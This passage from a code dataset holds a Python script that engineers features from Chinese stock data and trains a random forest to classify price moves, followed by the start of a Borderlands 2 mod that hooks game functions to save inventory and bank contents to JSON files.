sklearn_pandas import DataFrameMapper, cross_val_score\nimport sklearn.metrics as me \nimport pandas as pd\nimport sys,os\nimport numpy as np\nimport logging\nfrom datetime import *\nimport dateutil.relativedelta\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontManager, FontProperties \nimport pickle\nimport seaborn as sns\nfrom sklearn.preprocessing import Binarizer\nimport scipy.stats as stats \n\n\n\ndef onehot_to_category(onehot):\n b = np.array([[0], [1], [2],[3],[4],[5]])\n return np.dot(onehot,b).flatten()\n\ndef load_X_train():\n '''\n path = '/Users/huiyang/Documents/quantest/data_Shared/tuShare/'\n X_train = pd.read_excel(path + \"hist_data_M1.xlsx\")\n X_train['code'] = X_train['code'].map(lambda x: str(x).zfill(6))\n #X_train = X_train[X_train.date >= '2018-05-01']\n X_train.sort_values(by=['code' , 'date'], ascending=True, inplace=True)\n\n #filename = 'X_train_M1.xlsx'\n #X_train.to_excel(path + filename)\n # generate Y\n X_train_with_Y = pd.DataFrame([])\n X_test = pd.DataFrame([])\n code_list = sorted(X_train.code.drop_duplicates().tolist())\n for code in code_list:\n #print(code)\n X_train_code = X_train[X_train.code == code]\n if len(X_train_code) >= 2:\n i = 0\n while i <= (len(X_train_code) - 1):\n if i == (len(X_train_code) - 1):\n #输出最后一行到X_test,并从X_train集合删除\n X_train_code.iloc[i,6] = None\n X_train_code.iloc[i,7] = None\n X_test = X_test.append(X_train_code.tail(1))\n X_train_code = X_train_code.drop(X_train_code.index[i])\n else:\n X_train_code.iloc[i,6] = X_train_code.iloc[i+1,6] # price_change\n X_train_code.iloc[i,7] = X_train_code.iloc[i+1,7] # p_change\n i = i + 1\n \n X_train_with_Y = X_train_with_Y.append(X_train_code)\n\n filename = 'X_train_with_Y.xlsx'\n X_train_with_Y.to_excel(path + filename)\n filename = 'X_test.xlsx'\n X_test.to_excel(path + filename)\n\n # please note stock_basics_hist only contains data from 2016-08-09\n path = '/Users/huiyang/Documents/quantest/data_Shared/tuShare/'\n stock_basics_hist = pd.read_excel(path + \"stock_basics_hist.xlsx\")\n stock_basics_hist['code'] = stock_basics_hist['code'].map(lambda x: str(x).zfill(6))\n\n # testing purpose start\n path = '/Users/huiyang/Documents/quantest/data_Shared/tuShare/'\n X_train = pd.read_excel(path + \"X_train_with_Y.xlsx\")\n X_train['code'] = X_train['code'].map(lambda x: str(x).zfill(6))\n # testing purpose end\n stock_fundamentals_all = pd.read_excel(path + \"stock_fundamentals_all.xlsx\")\n stock_fundamentals_all['code'] = stock_fundamentals_all['code'].map(lambda x: str(x).zfill(6))\n X_train_with_fundamentals = pd.DataFrame([])\n for code, date in zip(X_train.code, X_train.date):\n stock_fundamentals = stock_fundamentals_all[(stock_fundamentals_all.code == code) \\\n & (stock_fundamentals_all.report_date <= date)]\n stock_basics_code = stock_basics_hist[(stock_basics_hist.code == code) \\\n &(stock_basics_hist.date <= date)]\n if not stock_fundamentals.empty:\n stock_fundamentals.sort_values(by='report_date', ascending=True, inplace=True)\n stock_fundamentals = stock_fundamentals.tail(1)\n stock_basics_code.sort_values(by='date', ascending=True, inplace=True)\n stock_basics_code = stock_basics_code.tail(1)\n X_train_code = X_train[(X_train.code == code) \\\n & (X_train.date == date)]\n X_train_code = pd.merge(X_train_code, stock_fundamentals, how='left', on=['code'])\n X_train_code = pd.merge(X_train_code, stock_basics_code, how='left', on=['code'])\n X_train_with_fundamentals = X_train_with_fundamentals.append(X_train_code)\n X_train_with_fundamentals.to_excel(path + 'X_train_with_fundamentals_M1.xlsx')\n '''\n # testing purpose start\n path = '/Users/huiyang/Documents/quantest/data_Shared/tuShare/'\n X_train = pd.read_excel(path + \"X_train_with_fundamentals_M1.xlsx\")\n X_train['code'] = X_train['code'].map(lambda x: str(x).zfill(6))\n\n # testing purpose end\n\n # get the volume for week\n\n # get the turnover ratio for week\n\n # need to check why no new stocks in the list.\n return X_train\n\n\ndef feature_engineering(X_train):\n #---------------------------------\n # Step 1: Select Data\n #----------------------------------\n #filter those timetomarket less than 60 days\n X_train = X_train.set_index(['code', 'date_x'], drop=False)\n print('total count before: ' + str(len(X_train)))\n for index, date, timetomarket in zip(X_train.index, X_train.date_x, X_train.timeToMarket_x):\n if date <= (datetime.strptime(timetomarket, '%Y-%m-%d') + \\\n dateutil.relativedelta.relativedelta(days=60)).date().isoformat():\n X_train = X_train.drop([index])\n X_train = X_train.reset_index(drop=True)\n print('total count after: ' + str(len(X_train)))\n\n # drop the unnecessary fields\n X_train.drop(\n ['code', 'date_x', 'open', 'high', 'low', \\\n 'name_x', 'report_date', 'quarter', \\\n 'price_change', 'v_ma5', 'v_ma10', 'v_ma20', \\\n 'volume', 'area_y', 'date_y', 'industry_y', 'name', 'timeToMarket_y'\n ], inplace=True, axis=1, errors='ignore')\n\n\n\n # industry filter\n #X_train = X_train[X_train.industry == '银行']\n #X_train.drop(\n # ['industry', 'area', 'timeToMarket', 'currentratio', 'quickratio', \\\n # 'cashratio', 'icratio', 'cashflowratio', 'cf_sales','arturnover', 'arturndays', \\\n # 'inventory_turnover', 'inventory_days', 'currentasset_turnover', 'currentasset_days', \\\n # 'mbrg', 'rateofreturn', 'cf_nm', 'cf_liabilities', 'ma5', 'ma10', 'ma20'\n # ], inplace=True, axis=1, errors='ignore')\n\n\n #---------------------------------\n # Step 2: Preprocess Data\n #----------------------------------\n X_train.rename(columns={'industry_x':'industry'}, inplace=True)\n X_train.rename(columns={'area_x':'area'}, inplace=True)\n X_train.rename(columns={'timeToMarket_x':'timeToMarket'}, inplace=True)\n\n \n #imputation of the missing values\n X_train['currentratio'] = X_train['currentratio'].map \\\n (lambda x: 'NaN' if x == '--' else x)\n X_train['quickratio'] = X_train['quickratio'].map \\\n (lambda x: 'NaN' if x == '--' else x)\n X_train['cashratio'] = X_train['cashratio'].map \\\n (lambda x: 'NaN' if x == '--' else x)\n X_train['icratio'] = X_train['icratio'].map \\\n (lambda x: 'NaN' if x == '--' else x) \n X_train['currentratio'] = X_train['currentratio'].astype('float64') \n X_train['quickratio'] = X_train['quickratio'].astype('float64') \n X_train['cashratio'] = X_train['cashratio'].astype('float64') \n X_train['icratio'] = X_train['icratio'].astype('float64') \n\n # for distrib\n X_train['distrib'] = X_train['distrib'].map(lambda x: 0 if x is np.nan else 1)\n #pd.set_option('display.max_columns', None)\n X_train['distrib'] = X_train['distrib'].astype('uint8') \n\n #timeToMarket\n X_train['timeToMarket'] = X_train['timeToMarket'].map(lambda x: x[0:4])\n X_train['timeToMarket'] = X_train['timeToMarket'].astype('uint8') \n\n\n # value count - frequency distribution\n \n #print(sorted(X_train.industry.drop_duplicates().tolist()))\n print('Total of categories in - industry: ')\n print(X_train['industry'].value_counts().count())\n print('frequency distribution of each category: ')\n print(X_train['industry'].value_counts())\n\n '''\n [周期股:\n '专用机械', '机床制造', '电气设备', '轻工机械', '运输设备', '机械基件','电器仪表'\n '全国地产', '其他建材', '区域地产', '工程机械', '房产服务', \n '园区开发', '建筑施工', '装修装饰', '水泥', '玻璃'\n '煤炭开采', '船舶', \n '造纸', \n '铁路', '港口', '空运', '公路', '仓储物流', '水运', '路桥', '机场', '航空'\n '铅锌', '铜', '铝', '小金属', '普钢', '特种钢', '钢加工', '焦炭加工', '矿物制品'\n '汽车整车', , '汽车服务', '汽车配件', '橡胶'\n '石油加工', '石油开采', '石油贸易', '塑料', '化工原料', '化工机械', '化纤'\n , '水力发电', '火力发电', '新型电力', '供气供热'\n , '保险', '银行', '证券', '多元金融', '黄金'\n\n 非周期:\n '中成药', '医疗保健', '医药商业', '化学制药', '生物制药'\n '互联网', '元器件', '半导体', '电脑设备', '软件服务', '通信设备'\n '乳制品', '农用机械', '农药化肥', '种植业', '饲料'\n '公共交通', '其他商业', '农业综合', \n , '商品城', '商贸代理', \n '啤酒', '白酒', '红黄药酒'\n '家居用品', '家用电器', '纺织', '纺织机械', '染料涂料', '服饰', \n '广告包装', '影视音像','出版业', '文教休闲', '旅游景点', '旅游服务', \n '批发业', '摩托车',\n '林业', '水务', '渔业', '环境保护', '电信运营', \n '电器连锁', '百货', '日用化工', '超市连锁', '软饮料', '酒店餐饮', '陶瓷', '食品',\n '综合类'\n ]\n '''\n periodic_stock = [\n '专用机械', '机床制造', '电气设备', '轻工机械', '运输设备', '机械基件','电器仪表',\n '全国地产', '其他建材', '区域地产', '工程机械', '房产服务', \n '园区开发', '建筑施工', '装修装饰', '��泥', '玻璃',\n '煤炭开采', '船舶', \n '造纸', \n '铁路', '港口', '空运', '公路', '仓储物流', '水运', '路桥', '机场', '航空',\n '铅锌', '铜', '铝', '小金属', '普钢', '特种钢', '钢加工', '焦炭加工', '矿物制品',\n '汽车整车', '汽车服务', '汽车配件', '橡胶',\n '石油加工', '石油开采', '石油贸易', '塑料', '化工原料', '化工机械', '化纤',\n '水力发电', '火力发电', '新型电力', '供气供热',\n '保险', '银行', '证券', '多元金融', '黄金'\n ]\n X_train['industry'] = X_train['industry'].map(lambda x: '周期' if x in periodic_stock else '非周期')\n # One-Hot encoding\n\n #cat_df_onehot = X_train.copy()\n X_train = pd.get_dummies(X_train, columns=['industry'], prefix = ['industry'])\n\n \n #print(sorted(X_train.area.drop_duplicates().tolist()))\n print('Total of categories in - area: ')\n print(X_train['area'].value_counts().count())\n print(X_train['area'].value_counts())\n \n #东南:\n south_east = ['上海', '江苏','浙江', '福建', '深圳', '广东', '广西', \n '山东', '海南']\n #中部:\n middle = ['河南', '安徽', '湖北', '江西', '湖南']\n # 西北:\n west_north = ['陕西', '甘肃', '青海', '宁夏', '新疆']\n #东北:\n east_north = ['吉林' , '辽宁', '黑龙江']\n #华北:\n china_north = ['北京', '天津', '河北', '内蒙', '山西']\n #云贵:\n yun_gui = ['云南', '贵州']\n #川藏:\n chuan_zang = ['四川', '重庆', '西藏']\n\n X_train['area'] = X_train['area'].map(lambda x: '东南' if x in south_east else x)\n X_train['area'] = X_train['area'].map(lambda x: '中部' if x in middle else x)\n X_train['area'] = X_train['area'].map(lambda x: '西北' if x in west_north else x)\n X_train['area'] = X_train['area'].map(lambda x: '东北' if x in east_north else x)\n X_train['area'] = X_train['area'].map(lambda x: '华北' if x in china_north else x)\n X_train['area'] = X_train['area'].map(lambda x: '云贵' if x in yun_gui else x)\n X_train['area'] = X_train['area'].map(lambda x: '川藏' if x in chuan_zang else x)\n X_train = pd.get_dummies(X_train, columns=['area'], prefix = ['area'])\n print(X_train)\n\n r, p=stats.pearsonr(X_train.eps_yoy,X_train.p_change)\n print (r)\n print (p)\n \n\n # drop the features with most of na values.\n X_train.drop(\n ['bvps_x', 'epcf' \\\n ], inplace=True, axis=1, errors='ignore')\n\n\n '''\n df = X_train.copy()\n #df.drop(['industry', 'area', 'timeToMarket' \\\n # ], inplace=True, axis=1, errors='ignore')\n imp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n \n mapper_df = DataFrameMapper([\n ('currentratio', imp.transform())\n ], df_out=True)\n #df = imp.fit_transform(df)\n print(mapper_df)\n '''\n '''\n X_train['industry'] = X_train['industry'].astype('category')\n X_train['area'] = X_train['area'].astype('category') \n #X_train['timeToMarket'] = X_train['timeToMarket'].astype('datetime64[D]') \n\n '''\n print(X_train.info())\n\n\n '''\n # estimate the score with or without imputation\n rng = np.random.RandomState(0)\n dataset = X_train\n X_full, y_full = dataset.currentratio, dataset.target\n n_samples = X_full.shape[0]\n n_features = X_full.shape[1]\n # Estimate the score on the entire dataset, with no missing values\n estimator = RandomForestRegressor(random_state=0, n_estimators=100)\n #score = cross_val_score(estimator, X_full, y_full).mean()\n #print(\"Score with the entire dataset = %.2f\" % score)\n \n # Add missing values in 75% of the lines\n missing_rate = 0.75\n n_missing_samples = int(np.floor(n_samples * missing_rate))\n missing_samples = np.hstack((np.zeros(n_samples - n_missing_samples,\n dtype=np.bool),\n np.ones(n_missing_samples,\n dtype=np.bool)))\n rng.shuffle(missing_samples)\n missing_features = rng.randint(0, n_features, n_missing_samples)\n \n # Estimate the score without the lines containing missing values\n X_filtered = X_full[~missing_samples, :]\n y_filtered = y_full[~missing_samples]\n estimator = RandomForestRegressor(random_state=0, n_estimators=100)\n score = cross_val_score(estimator, X_filtered, y_filtered).mean()\n print(\"Score without the samples containing missing values = %.2f\" % score)\n\n # Estimate the score after imputation of the missing values\n X_missing = X_full.copy()\n X_missing[np.where(missing_samples)[0], missing_features] = 0\n y_missing = y_full.copy()\n estimator = Pipeline([(\"imputer\", Imputer(missing_values=0,\n strategy=\"mean\",\n axis=0)),\n (\"forest\", RandomForestRegressor(random_state=0,\n n_estimators=100))])\n score = cross_val_score(estimator, X_missing, y_missing).mean()\n print(\"Score after imputation of the missing values = %.2f\" % score)\n '''\n # check the null values\n print('Total of null values: ' + str(X_train.isnull().values.sum()))\n print('Column-wse distribution of null values: \\n' + str(X_train.isnull().sum()))\n \n\n # boxplot the data\n font_small = FontProperties(fname='/Library/Fonts/Songti.ttc',size=9)\n font_medium = FontProperties(fname='/Library/Fonts/Songti.ttc',size=10)\n font_large = FontProperties(fname='/Library/Fonts/Songti.ttc', size=12)\n font_xlarge = FontProperties(fname='/Library/Fonts/Songti.ttc', size=14)\n\n plt.style.use('ggplot')\n fig_train_data, axes = plt.subplots(nrows=1, ncols=1, figsize=(10, 15))\n fig_train_data.suptitle('Train Data - boxplot',fontproperties=font_xlarge)\n\n axes = pd.DataFrame(X_train.pb).boxplot()\n xlabels = axes.get_xticklabels()\n for xlabel in xlabels:\n xlabel.set_rotation(90)\n xlabel.set_fontproperties(font_small)\n ylabels = axes.get_yticklabels()\n for ylabel in ylabels:\n ylabel.set_fontproperties(font_small)\n\n plt.show()\n\n \n\n '''\n industry_count = X_train['industry'].value_counts()\n sns.set(style=\"darkgrid\")\n sns.barplot(industry_count.index, industry_count.values, alpha=0.9)\n plt.title('Frequency Distribution of Industry')\n plt.ylabel('Number of Occurrences', fontsize=12)\n plt.xlabel('Industry', fontsize=12)\n plt.draw()\n '''\n\n ################ procedure to clean the data#####################\n # fillna?\n # dropna?\n # Encoding Categorical Data:\n # Replacing values \n # (replace with int only, weighting a value improperly?)\n # Encoding labels \n # (replace with int only, weighting a value improperly?)\n # One-Hot encoding \n # (The basic strategy is to convert each category value \n # into a new column and assign a 1 or 0 (True/False) value \n # to the column, benefit of not weighting a value improperly.)\n # Binary encoding\n # the categories are encoded as ordinal, \n # then those integers are converted into binary code, \n # then the digits from that binary string are split into separate columns.\n # Backward difference encoding\n # the mean of the dependent variable for a level \n # is compared with the mean of the dependent variable for the prior level. \n # This type of coding may be useful for a nominal or an ordinal variable.\n # http://www.statsmodels.org/dev/contrasts.html\n # Miscellaneous features\n # split these ranges into two separate columns \n # or replace them with some measure like the mean of that range.\n # PCA 降维\n ################################################################################\n\n #import pdb \n #pdb.set_trace()\n \n '''\n # Replacing values\n df_lc = df.copy()\n df_lc['industry'] = df_lc['industry'].astype('category')\n df_lc['area'] = df_lc['area'].astype('category') \n print(df_lc.dtypes)\n\n labels = df_lc['industry'].astype('category').cat.categories.tolist()\n replace_map_comp = {'industry' : {k: v for k,v in zip(labels,list(range(1,len(labels)+1)))}}\n print(replace_map_comp)\n\n df_replace = df_lc.copy()\n df_replace.replace(replace_map_comp, inplace=True)\n print(df_replace)\n\n # Encoding labels\n from sklearn.preprocessing import LabelEncoder\n lb_make = LabelEncoder()\n df_replace['area_code'] = lb_make.fit_transform(df_replace['area'])\n print(df_replace)\n '''\n\n #---------------------------------\n # Step 3: Transform Data\n #----------------------------------\n '''\n # Backward difference encoding\n cat_df_bd = df.copy()\n encoder = ce.BackwardDifferenceEncoder(cols=['area'])\n df_bd = encoder.fit_transform(cat_df_bd)\n\n print(df_bd.head())\n\n # Miscellaneous features\n cat_df_mis = df.copy()\n dummy_df_age = pd.DataFrame({'age': ['0-20', '20-40', '40-60','60-80']})\n dummy_df_age['start'], dummy_df_age['end'] = zip(*dummy_df_age['age'].map(lambda x: x.split('-')))\n\n dummy_df_age.head()\n\n '''\n X_train = X_train.dropna()\n print(X_train)\n\n '''\n # PCA 检测, can only detect for numeric fields\n df = df.dropna()\n pca_df = df.drop(['10days_percentage'], inplace=False, axis=1, errors='ignore')\n\n sc = preprocessing.StandardScaler()\n X_train_std = sc.fit_transform(pca_df)\n print(pd.DataFrame(X_train_std))\n pca = decomposition.PCA(n_components = 10)\n pca.fit(X_train_std)\n print (pca.explained_variance_ratio_)\n print (pca.explained_variance_)\n #print (pca.components_)\n #pandas.DataFrame(pca.transform(df), \n # columns=['PCA%i' % i for i in range(n_components)], \n # index=df.index)\n df = pd.DataFrame(pca.fit_transform(X_train_std), \\\n columns=['PCA%i' % i for i in range(2)], \\\n index=X_train_std.index)\n\n print(df)\n '''\n X_train.loc[(X_train['p_change'] < 0), 'Y_bin'] = -1\n X_train.loc[(X_train['p_change'] >= 0), 'Y_bin'] = 0\n X_train.loc[(X_train['p_change'] > 10), 'Y_bin'] = 1\n print('frequency distribution of each category: ')\n print(X_train['Y_bin'].value_counts())\n\n X_train_columns = X_train.columns.values.tolist()\n max_abs_scaler = preprocessing.MaxAbsScaler()\n X_train_MaxAbs = max_abs_scaler.fit_transform(X_train)\n X_train = pd.DataFrame(X_train_MaxAbs, columns=X_train_columns)\n ################################################################################\n\n # Y binary classification\n #bound = np.nanpercentile(cat_df_onehot['10days_percentage'], 20)\n\n #test = pd.DataFrame(Binarizer(threshold=0).fit_transform(df))\n #print(test)\n\n #bound = 20\n\n return X_train\n\ndef RF_train(X_train):\n\n # train dataframe split\n #logging.info(today_all)\n X = X_train.copy()\n Y = X.pop('Y_bin')\n X.pop('p_change')\n print(X)\n print(Y)\n train_size_perc = 0.8\n train_size = np.int16(np.round(train_size_perc * X.shape[0]))\n logging.info(train_size)\n X_train, Y_train = X.iloc[:train_size, :], Y.iloc[:train_size] #?\n X_test, Y_test = X.iloc[train_size:,:], Y.iloc[train_size:] #?\n # Random Forest train\n scaler = preprocessing.MinMaxScaler()\n X_train_trans = scaler.fit_transform(X_train)\n model = RF(n_estimators=2000).fit(X_train_trans, Y_train)\n\n # save model file\n pkl_filename = sys.path[0] + '/' + 'RF_model' + '_' + version + '.pkl'\n print(pkl_filename)\n with open(pkl_filename, 'wb') as file: \n pickle.dump(model, file)\n file.close()\n\n # validate the model\n Y_pred = model.predict(X_test)\n print (me.classification_report(Y_test, Y_pred))\n\n feature_importances = pd.Series(model.feature_importances_, index=X.columns)\n print(feature_importances)\n\n # plot show\n feature_importances.sort_values(ascending=False, inplace=True)\n\n font_small = FontProperties(fname='/Library/Fonts/Songti.ttc',size=9)\n font_medium = FontProperties(fname='/Library/Fonts/Songti.ttc',size=10)\n font_large=FontProperties(fname='/Library/Fonts/Songti.ttc', size=12)\n font_xlarge=FontProperties(fname='/Library/Fonts/Songti.ttc', size=14)\n\n plt.style.use('ggplot')\n fig_feature_importance, axes = plt.subplots(nrows=1, ncols=1, figsize=(10, 15))\n fig_feature_importance.suptitle('Feature Importances',fontproperties=font_xlarge)\n\n ax = feature_importances.plot(kind='bar')\n ax.set_xlabel('Features',fontproperties=font_medium)\n ax.set_ylabel('Importance (Gini Coefficient)',fontproperties=font_medium)\n\n xlabels = ax.get_xticklabels()\n for xlabel in xlabels:\n xlabel.set_fontproperties(font_small)\n ylabels = ax.get_yticklabels()\n for ylabel in ylabels:\n ylabel.set_fontproperties(font_small)\n\n plt.show()\n return\n\ndef load_X_test():\n df = pd.read_excel(io=\"/Users/huiyang/Documents/SPSS modeler/复盘/today_all_R_square.xlsx\")\n return df\n\ndef RF_prediction(X, savedModel):\n ###########################predict#############################\n path = sys.path[0]\n pkl_filename = sys.path[0] + '/' + 'RF_model' + '_' + version + '.pkl'\n # Load from file\n with open(pkl_filename, 'rb') as file: \n model = pickle.load(file)\n # RF prediction\n Y_pred = model.predict(X)\n #print (me.classification_report(X_test, Y_pred))\n\n feature_importances = pd.Series(model.feature_importances_, index=X.columns)\n print(feature_importances)\n\n return Y_pred\n\n\n\nif __name__ == '__main__': \n version = 'v2.0'\n \n X_train = load_X_train()\n\n train_df = feature_engineering(X_train=X_train)\n\n #####################################\n # for train and generate model\n RF_train(X_train=train_df)\n #for load model\n #model = load_model()\n #####################################\n\n #X_test = load_X_test()\n #RF_prediction(X=X_test, savedModel='RF_model.pkl')\n plt.show(block=False)","sub_path":"Machine_Learning/Random_Forest_V2.0.py","file_name":"Random_Forest_V2.0.py","file_ext":"py","file_size_in_byte":25095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"397538307","text":"import unrealsdk\nfrom unrealsdk import *\n\nfrom . import logging\n\nimport json\nimport os\n\n\n@logging.log_all_calls(logging.call_logger)\nclass PySave:\n\n def __init__(self, path):\n self.LOAD_PATH = None\n self.STASH_PATH = None\n self.stash_size = 6\n self.PATH = path\n self.b_load_json = False\n self.b_new_save = False\n self.b_apply_savedata = False\n\n def Enable(self):\n try:\n self.set_load_path(self.get_player_controller().\n GetSaveGameNameFromid(self.get_player_controller().GetCachedSaveGame().SaveGameId))\n except Exception as e:\n logging.logger.info(e)\n logging.logger.info(\"No CachedSaveGame found!\")\n\n def SaveGame_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.set_load_path(params.Filename)\n self.on_save_game(params)\n return True\n\n def BeginLoadGame_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.set_load_path(params.Filename)\n return True\n\n # It seems that ApplyItemSaveGameData() gets always called before ApplyWeaponSaveGameData().\n # I hope this is consistent\n def ApplyItem_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n if self.b_apply_savedata or not self.check_load_json_is_valid() or self.b_new_save:\n return True\n return False\n\n def ApplyGun_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n if self.b_apply_savedata or not self.check_load_json_is_valid() or self.b_new_save:\n self.b_new_save = False\n return True\n return False\n\n def OnSpawn_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n \"\"\"Not needed anymore maybe\"\"\"\n if self.b_new_save:\n return True\n if params.bIsInitialSpawn or params.bIsClassChange:\n self.b_load_json = True\n return True\n\n def BankStoreWpn_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.save_bank(params.WWeapon.DefinitionData, True, caller)\n return True\n\n def BankStoreItm_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.save_bank(params.WItem.DefinitionData, False, caller)\n return True\n\n def BankOpen_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n return self.bank_on_open(caller)\n\n def BankClose_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n return self.bank_on_close(caller)\n\n def NewGame_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.b_load_json = False\n self.b_new_save = True\n logging.logger.info(f\"bl2pysave b_new_save: {self.b_new_save}\")\n return True\n\n unrealsdk.RegisterHook(\"WillowGame.WillowSaveGameManager.SaveGame\", \"SaveGame_Hook\", SaveGame_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowSaveGameManager.BeginLoadGame\", \"BeginLoadGame_Hook\",\n BeginLoadGame_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowPlayerController.ApplyItemSaveGameData\", \"ApplyItem_Hook\",\n ApplyItem_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowPlayerController.ApplyWeaponSaveGameData\", \"ApplyGun_Hook\",\n ApplyGun_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowPlayerController.ShouldLoadSaveGameOnSpawn\", \"OnSpawn_Hook\",\n OnSpawn_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowInventoryStorage.PutWeapon\", \"BankStoreWeapon\",\n BankStoreWpn_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowInventoryStorage.PutItem\", \"BankStoreItem\", BankStoreItm_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowInventoryStorage.Open\", \"BankOpen\", BankOpen_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowInventoryStorage.Close\", \"BankCloe\", BankClose_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowGlobals.GetDefaultPlayerSaveGame\", \"NewGame\", NewGame_Hook)\n\n def Disable(self):\n pass\n\n def on_end_load(self):\n # We load our saves after the new materials got assigned or else the equipped gear wont have the right skin\n if self.b_load_json:\n logging.logger.debug(f\"Will now try to load {self.LOAD_PATH}\")\n self.compare_and_load()\n self.b_load_json = False\n if self.b_apply_savedata:\n self.b_apply_savedata = False\n\n def set_load_path(self, Filename):\n if not os.path.exists(os.path.join(self.PATH, \"Saves\")):\n logging.logger.debug(f\"Could not find /Saves/ will now attempt to create it!\")\n # if the \"Saves/\" folder does not exist, create it\n os.makedirs(os.path.join(self.PATH, \"Saves\"))\n logging.logger.debug(f\"/Saves/ exists: {os.path.exists(os.path.join(self.PATH, 'Saves'))}\")\n\n filename = Filename.split(\".\")[0] # get the save name without its .sav extension\n if os.path.isfile(os.path.join(self.PATH, \"Saves\", f\"{filename}.json\")):\n # if the json save exist, set it as the loading path\n self.LOAD_PATH = os.path.join(self.PATH, \"Saves\", filename + \".json\")\n self.b_new_save = False\n else:\n # else we need to create the json, mark it as new, so that the .sav items get loaded and wont be removed\n # because it now does exist, set it as the load path\n with open(os.path.join(self.PATH, \"Saves\", f\"{filename}.json\"), \"w\") as file:\n self.b_new_save = True\n self.LOAD_PATH = os.path.join(self.PATH, \"Saves\", filename + \".json\")\n logging.logger.debug(f\"Created 'Saves/{filename}.json'\")\n\n if not os.path.isfile(os.path.join(self.PATH, \"Saves\", \"STASH.json\")):\n with open(os.path.join(self.PATH, \"Saves\", \"STASH.json\"), \"w\") as f:\n json.dump({\"Weapons\": [], \"Items\": []}, f, indent=2)\n self.STASH_PATH = os.path.join(self.PATH, \"Saves\", \"STASH.json\")\n\n def get_player_controller(self):\n return GetEngine().GamePlayers[0].Actor\n\n def get_full_name(self, obj):\n if obj is not None:\n return obj.PathName(obj)\n elif obj is None:\n return \"None\"\n\n def get_weapon_from_data(self, defdata):\n return {\"WeaponTypeDefinition\": self.get_full_name(defdata.WeaponTypeDefinition),\n \"BalanceDefinition\": self.get_full_name(defdata.BalanceDefinition),\n \"ManufacturerDefinition\": self.get_full_name(defdata.ManufacturerDefinition),\n \"ManufacturerGradeIndex\": defdata.ManufacturerGradeIndex,\n \"BodyPartDefinition\": self.get_full_name(defdata.BodyPartDefinition),\n \"GripPartDefinition\": self.get_full_name(defdata.GripPartDefinition),\n \"BarrelPartDefinition\": self.get_full_name(defdata.BarrelPartDefinition),\n \"SightPartDefinition\": self.get_full_name(defdata.SightPartDefinition),\n \"StockPartDefinition\": self.get_full_name(defdata.StockPartDefinition),\n \"ElementalPartDefinition\": self.get_full_name(defdata.ElementalPartDefinition),\n \"Accessory1PartDefinition\": self.get_full_name(defdata.Accessory1PartDefinition),\n \"Accessory2PartDefinition\": self.get_full_name(defdata.Accessory2PartDefinition),\n \"MaterialPartDefinition\": self.get_full_name(defdata.MaterialPartDefinition),\n \"PrefixPartDefinition\": self.get_full_name(defdata.PrefixPartDefinition),\n \"TitlePartDefinition\": self.get_full_name(defdata.TitlePartDefinition),\n \"GameStage\": defdata.GameStage,\n \"UniqueId\": defdata.UniqueId, }\n\n def get_item_from_data(self, defdata):\n return {\"ItemDefinition\": self.get_full_name(defdata.ItemDefinition),\n \"BalanceDefinition\": self.get_full_name(defdata.BalanceDefinition),\n \"ManufacturerDefinition\": self.get_full_name(defdata.ManufacturerDefinition),\n \"ManufacturerGradeIndex\": defdata.ManufacturerGradeIndex,\n \"AlphaItemPartDefinition\": self.get_full_name(defdata.AlphaItemPartDefinition),\n \"BetaItemPartDefinition\": self.get_full_name(defdata.BetaItemPartDefinition),\n \"GammaItemPartDefinition\": self.get_full_name(defdata.GammaItemPartDefinition),\n \"DeltaItemPartDefinition\": self.get_full_name(defdata.DeltaItemPartDefinition),\n \"EpsilonItemPartDefinition\": self.get_full_name(defdata.EpsilonItemPartDefinition),\n \"ZetaItemPartDefinition\": self.get_full_name(defdata.ZetaItemPartDefinition),\n \"EtaItemPartDefinition\": self.get_full_name(defdata.EtaItemPartDefinition),\n \"ThetaItemPartDefinition\": self.get_full_name(defdata.ThetaItemPartDefinition),\n \"MaterialItemPartDefinition\": self.get_full_name(defdata.MaterialItemPartDefinition),\n \"PrefixItemNamePartDefinition\": self.get_full_name(defdata.PrefixItemNamePartDefinition),\n \"TitleItemNamePartDefinition\": self.get_full_name(defdata.TitleItemNamePartDefinition),\n \"GameStage\": defdata.GameStage,\n \"UniqueId\": defdata.UniqueId, }\n\n def save_bank(self, def_data, is_wpn, caller):\n # We dont need to check for file existence because if you store an item to the bank you already had saved at\n # least once\n if caller.MaxSlots == 4:\n save_file = open(self.STASH_PATH, \"r\")\n else:\n save_file = open(self.LOAD_PATH, \"r\")\n save_json = json.load(save_file)\n save_file.close()\n\n if caller.MaxSlots == 4:\n # actually the stash\n save_bank = save_json\n else:\n save_bank = save_json.get(\"Bank\", list())\n\n with open(self.LOAD_PATH if caller.MaxSlots != 4 else self.STASH_PATH, \"w\") as fp:\n dump = {\"Weapons\": save_bank.get(\"Weapons\", list()), \"Items\": save_bank.get(\"Items\", list())}\n\n if is_wpn:\n dump[\"Weapons\"].append(self.get_weapon_from_data(def_data))\n else:\n dump[\"Items\"].append(self.get_item_from_data(def_data))\n save_json[\"Bank\"] = dump\n json.dump(save_json, fp, indent=4)\n\n def save_backpack(self, fd, SaveGame, bank): # we also need the bank to not overwrite it, we will append it again\n dump = {}\n inventory = []\n curr_equipped = []\n for WeaponSaveGameData in SaveGame.WeaponData:\n defdata = WeaponSaveGameData.WeaponDefinitionData\n if WeaponSaveGameData.Quickslot < 1:\n 